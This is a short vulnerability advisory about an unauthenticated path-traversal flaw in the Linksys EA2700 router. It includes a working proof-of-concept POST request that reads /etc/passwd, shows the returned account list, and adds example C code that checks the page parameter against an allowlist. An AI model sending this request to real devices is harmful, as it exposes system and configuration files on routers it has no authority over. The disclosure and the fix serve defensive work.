Linksys EA2700 arbitrary file traversal vulnerability

2013-04-09T00:00:00
ID MYHACK58:62201338208
Type myhack58
Reporter Anonymous
Modified 2013-04-09T00:00:00

Description

Brief description:

The router's software has never undergone security penetration testing; without logging in, you can easily retrieve the router's /etc/passwd file or other configuration files.

Detailed description:

The router's software has never undergone security penetration testing; without logging in, you can easily retrieve the router's /etc/passwd file or other configuration files.

Proof of vulnerability:

POST /apply.cgi
Host: 192.168.1.1

submit_button=Wireless_Basic&change_action=gozila_cgi&next_page=/etc/passwd

====>

root:x:0:0::/:/bin/sh
nobody:x:99:99:Nobody:/:/bin/nologin
sshd:x:22:22::/var/empty:/sbin/nologin
admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh
quagga:x:1001:1001:Quagga:/var/empty:/bin/nologin
firewall:x:1002:1002:Firewall:/var/empty:/bin/nologin

Remediation:

Notify the vendor so that it subjects the router software to rigorous security testing and fixes the issue.
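
One way a CGI handler could constrain the next_page value shown in the request above is to decode it and accept only an exact match against a fixed list of UI pages. This is an added example, not Linksys firmware code or part of the original advisory; the function names and the page names in the allowlist are hypothetical, and the handler would still need to require a logged-in session before processing the request.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical allowlist of UI pages (constructed names, not from the firmware). */
static const char *const ALLOWED_PAGES[] = {
    "Wireless_Basic.asp", "Status_Router.asp", "index.asp",
};

/* Decode %XX and '+' from a form value into out.
 * Returns 0 on success, -1 on a malformed escape, an encoded NUL, or overflow. */
static int form_decode(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    for (; *in; in++) {
        unsigned char c = (unsigned char)*in;
        if (c == '%') {
            if (!isxdigit((unsigned char)in[1]) || !isxdigit((unsigned char)in[2]))
                return -1;
            char hex[3] = { in[1], in[2], '\0' };
            c = (unsigned char)strtol(hex, NULL, 16);
            in += 2;
            if (c == '\0')          /* %00 would truncate the name later on */
                return -1;
        } else if (c == '+') {
            c = ' ';
        }
        if (o + 1 >= outlen)
            return -1;
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return 0;
}

/* Returns 1 only if the raw form value decodes to an exact allowlisted page
 * name; absolute paths, "../" sequences and encoded variants never match. */
int next_page_allowed(const char *raw)
{
    char page[64];
    if (raw == NULL || form_decode(raw, page, sizeof page) != 0)
        return 0;
    for (size_t i = 0; i < sizeof ALLOWED_PAGES / sizeof ALLOWED_PAGES[0]; i++)
        if (strcmp(page, ALLOWED_PAGES[i]) == 0)
            return 1;
    return 0;
}
```

Because the check is an exact match after a single decode, the value is never used to build a filesystem path, so there is no path prefix or filter to bypass.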